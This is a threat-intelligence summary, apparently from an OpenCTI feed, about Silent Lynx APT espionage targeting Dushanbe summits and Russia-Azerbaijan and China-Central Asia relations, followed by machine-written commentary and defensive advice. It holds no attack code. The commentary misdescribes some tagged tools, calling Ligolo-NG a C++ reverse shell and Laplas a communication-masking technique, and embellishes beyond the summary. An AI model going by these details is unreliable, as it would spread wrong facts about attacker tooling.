Operation Peek-a-Baku: Silent Lynx APT Targets Dushanbe with Espionage Campaign

SUMMARY :

The Silent Lynx APT group has been conducting espionage campaigns targeting Central Asian nations, Russia, China, and Azerbaijan. Two main campaigns were identified: one focusing on Russia-Azerbaijan relations and another on China-Central Asia relations. The group uses various malware including PowerShell scripts, .NET implants, and C++ reverse shells. They leverage spear-phishing with malicious attachments, GitHub-hosted payloads, and scheduled tasks for persistence. The campaigns aim to gather intelligence on diplomatic communications, transportation projects, and other strategic initiatives. Silent Lynx shows a pattern of targeting summit meetings and infrastructure deals in the region, with a particular focus on events in Dushanbe, Tajikistan.

OPENCTI LABELS :

.net,reverse shell,china,apt,powershell,espionage,russia,central asia,azerbaijan,silentsweeper,silent loader,ligolo-ng,laplas


AI COMMENTARY :

1. Operation Peek-a-Baku emerged as a concerted espionage campaign orchestrated by the Silent Lynx APT group, known for its precision in targeting high-value geopolitical events. This operation zeroes in on Dushanbe, Tajikistan, exploiting the backdrop of diplomatic engagements and infrastructure negotiations. The group’s historical footprint spans Central Asian nations, Russia, China, and Azerbaijan, underlining its strategic focus on regions where political alliances and economic ventures intersect. Silent Lynx has earned its reputation through SilentSweeper and Silent Loader toolsets, demonstrating a consistent ability to infiltrate sensitive networks.

2. The campaign unfolds in two main thrusts: one probing Russia-Azerbaijan relations and another delving into China-Central Asia ties. In the Russia-Azerbaijan vector, operatives seek to intercept communications and documents tied to energy corridors and military partnerships. Meanwhile, the China-Central Asia axis focuses on Belt and Road transportation projects, high-level summit planning, and infrastructure financing agreements. Both prongs converge on summit meetings in Dushanbe, revealing an intent to gather real-time intelligence ahead of diplomatic talks and project milestones.

3. Silent Lynx deploys a multifaceted arsenal comprising PowerShell scripts, .NET implants, and C++ reverse shells such as Ligolo-NG. Initial access is frequently gained through spear-phishing emails carrying malicious attachments or links to GitHub-hosted payloads. Once inside a network, the group establishes persistence via scheduled tasks and leverages Laplas techniques to mask communications with command-and-control servers. The reverse shell capabilities enable remote code execution and data exfiltration under the radar of conventional security platforms.

4. The principal objective of this espionage campaign is to harvest intelligence on diplomatic communications, transportation project schedules, and financing details. By monitoring these elements, Silent Lynx can influence negotiations or gain a strategic edge in regional power dynamics. Insights into summit agendas and bilateral agreements provide actionable data for state sponsors or affiliated organizations aligned with the APT’s interests.

5. The implications of Operation Peek-a-Baku extend well beyond Tajikistan’s borders. Nations involved in regional infrastructure deals must recognize the increased risk of targeted espionage. The sophistication of .NET implants and reverse shell techniques highlights the evolving threat landscape, demanding a reassessment of current defenses. Central Asia’s growing economic significance makes it an appealing target for APT groups seeking to capitalize on the flow of diplomatic and commercial information.

6. To counter the Silent Lynx campaign, organizations should implement advanced email filtering, endpoint detection and response solutions tuned to PowerShell and .NET anomalies, and network segmentation to isolate critical assets. Regular threat hunting exercises focusing on C++ reverse shell indicators and anomalous scheduled task configurations can unearth hidden implants. Collaboration with regional partners and threat intelligence sharing will help anticipate future APT movements.

7. Operation Peek-a-Baku underscores the persistent threat posed by state-sponsored espionage in Central Asia. By dissecting the tactics, techniques, and procedures of Silent Lynx, defenders can strengthen their posture against complex campaigns targeting diplomatic and infrastructure initiatives. Vigilance, proactive defense measures, and international cooperation remain essential to safeguarding sensitive projects and communications from sophisticated APT groups.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Operation Peek-a-Baku: Silent Lynx APT Targets Dushanbe with Espionage Campaign